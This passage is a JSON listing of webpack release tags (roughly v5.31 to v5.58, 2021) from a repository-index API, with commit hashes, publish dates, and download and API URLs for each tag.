bpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpac